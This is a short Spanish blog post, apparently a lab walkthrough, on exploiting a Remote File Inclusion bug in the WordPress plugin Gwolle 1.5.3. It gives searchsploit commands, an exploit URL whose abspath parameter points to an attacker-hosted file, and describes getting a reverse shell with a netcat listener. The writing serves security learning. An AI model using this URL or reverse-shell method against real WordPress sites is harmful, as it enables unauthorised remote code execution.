← Back to list

Remote File Inclusion (RFI)

La vulnerabilidad Remote File Inclusion, también conocida como RFI, nos permite insertar un archivo desde una máquina atacante, abriendo…

TheWhiteRabbit · 2026-01-28 19:51 · 0 claps · 1.7 min read
#reverse-shell #remote-file-inclusion #rfi #wordpress-plugins
Open on Medium ↗
Wiki topics: 📰 · Journalism & News ✊ · Equality & Identity

Remote File Inclusion (RFI)

La vulnerabilidad Remote File Inclusion, también conocida como RFI, nos permite insertar un archivo desde una máquina atacante, abriendo así un abanico de posibilidades.

El entorno de pruebas es un Wordpress donde estaremos alojando un plugin vulnerable, pudiendo escribir código en él para conseguir una reverse shell.

El plugin vulnerable en cuestión es Gwolle 1.5.3, así que buscamos un exploit con searchsploit.

searchsploit gwolle

Reverse shell

Ahora tenemos que leer el código del exploit a ver si nos proporciona alguna pista de como hacer el RFI. Para eso usaremos searchsploit otra vez.

searchsploit -x php/webapps/38861.txt

Básicamente, nos dice que siguiendo la ruta que nos indica nos cargará el archivo wp-load.php.

Pero antes, tenemos que configurar el archivo seteándolo en 1, php.ini.

Una vez hecho este proceso, ya podemos conectarnos a la máquina en la ruta que dice el exploit.

http://localhost:31337/wp-content/plugins/gwolle-gb/frontend/captcha/ajaxresponse.php?abspath=http://192.168.1.42/

Ahora solo tenemos que modificar el archivo para meter nuestra reverse shell, para ello la crearemos con la web Revshell Generator y nos pondremos a la escucha con nc.

Volvemos a introducir la ruta de antes y ya estamos dentro.


메타데이터
post_id
e8a989088f71
slug
remote-file-inclusion-rfi-e8a989088f71
url
https://medium.com/@M4rc0sX/remote-file-inclusion-rfi-e8a989088f71
canonical_url
https://medium.com/@M4rc0sX/remote-file-inclusion-rfi-e8a989088f71
author_url
https://medium.com/@M4rc0sX
status
ok
fetched_at
2026-07-15 21:32:05